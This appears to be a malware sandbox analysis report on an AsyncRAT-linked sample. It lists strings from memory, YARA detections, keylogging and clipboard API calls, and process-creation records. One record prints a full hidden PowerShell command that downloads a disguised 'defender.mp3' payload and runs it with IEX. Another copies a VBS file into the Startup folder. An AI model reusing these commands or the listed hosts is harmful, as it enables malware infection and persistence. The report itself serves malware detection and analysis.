Source: conhost.exe, 00000011.00000002.494826306.0000027804085000.00000004.00000040.sdmp, conhost.exe, 00000011.00000002.491494117.00000278037F5000.00000004.00000040.sdmp, conhost.exe, 00000011.00000002.494023948.0000027803CE8000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.494003575.0000027803CE0000.00000004.00000001.sdmp | String found in binary or memory: http://46.1.54.174:77/Vre
Source: conhost.exe, 00000008.00000002.492055744.000001E6CD773000.00000004.00000020.sdmp | String found in binary or memory: http://46.1.54.174:77/VreY
Source: conhost.exe, 00000008.00000002.492055744.000001E6CD773000.00000004.00000020.sdmp | String found in binary or memory: http://46.1.54.174:77/Vre_Num
Source: conhost.exe, 00000008.00000002.498337037.000001E6CF9F5000.00000004.00000040.sdmp | String found in binary or memory: http://46.1.54.174:77/Vree
Source: conhost.exe, 00000008.00000002.498337037.000001E6CF9F5000.00000004.00000040.sdmp | String found in binary or memory: http://46.1.54.174:77/Vreg
Source: conhost.exe, 00000011.00000002.494276135.0000027803EC0000.00000004.00000001.sdmp | String found in binary or memory: http://46.1.54.174:77/Vrex
Source: conhost.exe, 00000011.00000002.494276135.0000027803EC0000.00000004.00000001.sdmp | String found in binary or memory: http://46.1.54.174:77/Vrey6
Source: powershell.exe, 0000000E.00000003.444991157.000001339D35B000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 0000000E.00000003.444991157.000001339D35B000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: conhost.exe, 00000011.00000002.490795948.0000027801EDD000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsi
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000008.00000002.491937157.000001E6CD74E000.00000004.00000020.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: conhost.exe, 00000008.00000002.491716688.000001E6CD71D000.00000004.00000020.sdmp, powershell.exe, 0000000B.00000002.248780710.00000179D1290000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.493872523.00000133849AF000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 0000000E.00000002.504860764.000001339D2F8000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 0000000E.00000002.492495968.0000013382F94000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab2
Source: powershell.exe, 0000000E.00000002.504860764.000001339D2F8000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enEM32
                        Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 0000000E.00000003.444991157.000001339D35B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                        Source: conhost.exe, 00000008.00000002.491937157.000001E6CD74E000.00000004.00000020.sdmpString found in binary or memory: http://ocsp2.g
                        Source: conhost.exe, 00000011.00000002.490795948.0000027801EDD000.00000004.00000020.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gsH
                        Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                        Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                        Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                        Source: powershell.exe, 0000000E.00000002.493807652.0000013384950000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 0000000B.00000002.244669019.00000179B8E41000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.494107143.0000013384A61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: conhost.exe, 00000011.00000002.490795948.0000027801EDD000.00000004.00000020.sdmpString found in binary or memory: http://secure.gl
                        Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                        Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                        Source: powershell.exe, 0000000E.00000002.493807652.0000013384950000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: Ne - Copy.exe, Ne - Copy.exe, 00000003.00000002.238457084.00000001400DE000.00000002.00020000.sdmpString found in binary or memory: https://autohotkey.com
                        Source: xuXIetZvv6.exe, 00000000.00000000.219549326.00000000006E2000.00000002.00020000.sdmp, Ne - Copy.exe, 00000003.00000002.238457084.00000001400DE000.00000002.00020000.sdmpString found in binary or memory: https://autohotkey.comCould
                        Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                        Source: xuXIetZvv6.exe, xuXIetZvv6.exe, 00000000.00000000.219734739.00000000007D8000.00000002.00020000.sdmp, wscript.exe, 00000006.00000002.491404770.000002F0A0FD8000.00000004.00000020.sdmp, wscript.exe, 00000006.00000002.495593185.000002F0A2D40000.00000004.00000001.sdmp, wscript.exe, 00000006.00000002.492055438.000002F0A12B5000.00000004.00000040.sdmp, powershell.exe, 0000000B.00000002.245936252.00000179B9330000.00000004.00000001.sdmpString found in binary or memory: https://gist.githubusercontent.com/kingspy34/2c11abc534523a39b97d60fc60841e8b/raw/1f298839458580e6a8
                        Source: powershell.exe, 0000000E.00000002.493807652.0000013384950000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 0000000E.00000002.502702758.0000013394AE1000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: conhost.exe, 00000008.00000002.491937157.000001E6CD74E000.00000004.00000020.sdmpString found in binary or memory: https://www.globalsign.com
                        Source: conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.490466697.0000027801E18000.00000004.00000020.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                        Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000003.246382662.00000278037F7000.00000004.00000001.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
                        Source: powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmpString found in binary or memory: https://www.uplooder.net
                        Source: powershell.exe, 0000000E.00000002.491810873.0000013382F10000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.493315849.00000133830B5000.00000004.00000040.sdmp, powershell.exe, 0000000E.00000002.492495968.0000013382F94000.00000004.00000020.sdmpString found in binary or memory: https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3
                        Source: powershell.exe, 0000000E.00000002.495724042.0000013384C6B000.00000004.00000001.sdmpString found in binary or memory: https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp30y
                        Source: conhost.exeString found in binary or memory: https://www.vbsedit.com/tr_register.asp?launcher=
                        Source: xuXIetZvv6.exe, 00000000.00000002.237748309.0000000012D29000.00000004.00000001.sdmp, Ne - Copy.exe, 00000003.00000000.229681620.0000000140127000.00000002.00020000.sdmp, conhost.exe, 00000008.00000003.232085242.000001E6CD70D000.00000004.00000001.sdmp, conhost.exe, 00000011.00000002.496341354.00007FF7AB00B000.00000002.00020000.sdmp, conhost.exe, 00000027.00000002.315067443.00007FF772C3B000.00000002.00020000.sdmpString found in binary or memory: https://www.vbsedit.com/tr_register.asp?launcher=openiexplore.exe
                        Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49711
                        Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49722
                        Source: unknown; Network traffic detected: HTTP traffic on port 49711 -> 443
                        Source: unknown; Network traffic detected: HTTP traffic on port 49722 -> 443

                        Key, Mouse, Clipboard, Microphone and Screen Capturing:

                        Yara detected AsyncRAT
                        Source: Yara match; File source: 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match; File source: 0000000E.00000002.504520772.000001339CFF0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match; File source: 0000000E.00000003.272338570.0000013386CFC000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match; File source: Process Memory Space: powershell.exe PID: 6920, type: MEMORY
                        Source: Yara match; File source: 14.2.powershell.exe.13385685750.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 14.2.powershell.exe.1339cff0000.6.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 14.2.powershell.exe.1339cff0000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara match; File source: 14.2.powershell.exe.13385685750.3.unpack, type: UNPACKEDPE
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe; Code function: 3_2_0000000140006510 GetTickCount,OpenClipboard,GetTickCount,OpenClipboard,
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe; Code function: 3_2_00000001400063F0 GetClipboardFormatNameW,GetClipboardData,
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe; Code function: 3_2_0000000140054730 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetSystemMetrics,GetSystemMetrics,wcsncpy,GetDC,DestroyIcon,DeleteObject,GetIconInfo,CreateCompatibleDC,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,malloc,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,malloc,
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe; Code function: 3_2_0000000140016300 GetTickCount,PeekMessageW,GetTickCount,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe; Code function: 3_2_0000000140001B0C GlobalUnlock,CloseClipboard,SetTimer,GetTickCount,GetTickCount,GetMessageW,GetTickCount,GetFocus,TranslateAcceleratorW,GetKeyState,GetWindowLongW,IsWindowEnabled,GetKeyState,GetKeyState,GetKeyState,SendMessageW,SendMessageW,PostMessageW,SendMessageW,SendMessageW,IsDialogMessageW,ShowWindow,GetForegroundWindow,GetWindowThreadProcessId,GetClassNameW,IsDialogMessageW,SetCurrentDirectoryW,KillTimer,

                        System Summary:

                        Malicious sample detected (through community Yara rule)
                        Source: 00000000.00000002.236414924.0000000002C42000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects Molerats sample - July 2017; Author: Florian Roth
                        Source: C:\Users\user\AppData\Roaming\winlogon.vbs, type: DROPPED; Matched rule: Detects Molerats sample - July 2017; Author: Florian Roth
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.vbs, type: DROPPED; Matched rule: Detects Molerats sample - July 2017; Author: Florian Roth
                        Dynamically executes javascript script code
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe; Code function: 39_2_00007FF772C17CA0 SetFilePointer,ReadFile,CloseHandle,DestroyWindow,GetModuleFileNameW,#2,MessageBoxW,CLSIDFromProgID,CoCreateInstance,#8,CLSIDFromProgID,CoCreateInstance,#4,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\conhost.exe; Code function: 39_2_00007FF772C17EB0 SetFilePointer,ReadFile,CloseHandle,SetFilePointer,ReadFile,CloseHandle,DestroyWindow,CLSIDFromProgID,CoCreateInstance,#8,CLSIDFromProgID,CoCreateInstance,#4,#4,CLSIDFromProgID,CoCreateInstance,MessageBoxW,MessageBoxW,MessageBoxW,MessageBoxW,#4,#2,#2,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,
                        Sample or dropped binary is a compiled AutoHotkey binary
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe; Window found: window name: AutoHotkey
                        Wscript starts Powershell (via cmd or directly)
                        Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\winlogon.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\winlogon.vbs'))'
                        Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://www.uplooder.net/f/tl/31/ee790edf8aa2f02c1ffb71003ad4a5c8/defender.mp3');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; wasawasawasawasa
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe; Code function: 3_2_000000014005EF30: CreateFileW,DeviceIoControl,CloseHandle,
                        Source: C:\ProgramData\conhost.exe; Code function: 8_2_00007FF7AAFD63C0 GetModuleFileNameW,CreateProcessWithLogonW,GetLastError,FormatMessageW,GetLastError,MessageBoxW,LocalFree,GetLastError,ExitProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CreateThread,CoInitialize,GetActiveWindow,SetLastError,GetCurrentThreadId,EnterCriticalSection,LeaveCriticalSection,DialogBoxParamW,CoUninitialize,
                        Source: C:\Users\user\AppData\Roaming\Ne - Copy.exe; Code function: 3_2_00000001400810B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,